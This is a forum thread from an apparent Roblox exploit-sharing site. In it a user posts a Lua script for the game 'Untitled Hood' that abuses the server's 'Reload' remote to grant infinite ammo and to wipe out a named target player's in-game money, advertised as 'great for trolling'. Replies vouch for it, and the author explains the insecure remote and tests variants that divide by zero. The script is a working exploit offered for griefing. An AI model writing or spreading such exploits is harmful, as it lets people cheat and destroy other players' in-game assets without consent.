Forum > Scripts >

[UNTITLED HOOD] BANKRUPT PLAYERS | GREAT FOR TROLLING

Nolix

use vantra hub

Posts: 375

Threads: 56

Joined: Mar, 2022

Reputation: 11

Posted

hey people, been a while I know

 

I havent had the courage to make scripts anymore, prob just from roblox being trash as hell and I most likely wont make much more.

 

but this script was damn interesting enough for me to change it and all to make it more fun

 

credits to the original guy who (I think) made this: HERE

 

note: this is FE and can be done to anyone in your game if you have their username (you also need to have a revolver)

 

local target = "target name here"

game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
   "Reload",
   {
       Name = "[Revolver]",
       Ammo = {Value = math.huge*9e9},
       MaxAmmo = {Value = 0}
   }
)

task.wait(2)

game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
   "Reload",
   {
        Name = "[Revolver]",
        Ammo = game:GetService("Players")[target].DataFolder.Currency,
        MaxAmmo = {Value = -69}
   }
)

UPDATE: Added the original infinite ammo code so you wont run out of ammo on your revolver if you bankrupt too much players.

  • 0

Posts: 426

Threads: 32

Joined: Aug, 2021

Reputation: 54

Replied

vouch nice release :)

  • 0

Owner @ https://altbot.win

The #1 Account Gen for Roblox

Posts: 3

Threads: 2

Joined: Apr, 2022

Reputation: 0

Replied

I did try this and I am surprised that it is work very well.

  • 0

Nolix

use vantra hub

Posts: 375

Threads: 56

Joined: Mar, 2022

Reputation: 11

Replied

@_realnickk

 

tested this theory out, and its half true.

 

once executed the script with it changed to 1 divided by 0 it doesnt bankrupt the target completely but only half if the target already has a high amount of money (such as 9 billion or so given from a different exploiter) so assuming the target has 9 billion cash, 1 divided by 0 will lead to somewhere around 500 dollars (from my tests)

 

so, you could just spam 1 divided by 0 like 2 times to get a satisfying result such as this, and no you cannot set a target's cash to NaN with this, instead it sets your used gun's ammo to NaN which still just gives you infinite ammo:

 

https://cdn.discordapp.com/attachments/778386486931226644/963292585294704660/unknown.png

 

and yes you're very correct with this being a huge vulnverbility issue, a sh!t ton of crazy FE stuff has been used in untitled hood from what ive seen, im gonna keep trying to change values with this and see if im able to get something

 

https://cdn.discordapp.com/attachments/778386486931226644/963293926897360936/unknown.png

 

explanation on how this works: (boring if you dont give a single damn)

 

this script is just a remote thats fired to the game, and if you know about remotes you know its what devs use to run server sided stuff for there game. well the "Reload" remote in untitled hood has 3 arguments used, "Name, Ammo, Max Ammo" the ammo argument is where the remote communicates with the ammo value stored in your revolver, but with a simple script such as this can be changed to any value present in the game, and since roblox it self is very insecure and stores a lot of important information in values you may be able to change this to something that could ruin a player's experience.

  • 0

Users viewing this thread:

( Members: 0, Guests: 1, Total: 1 )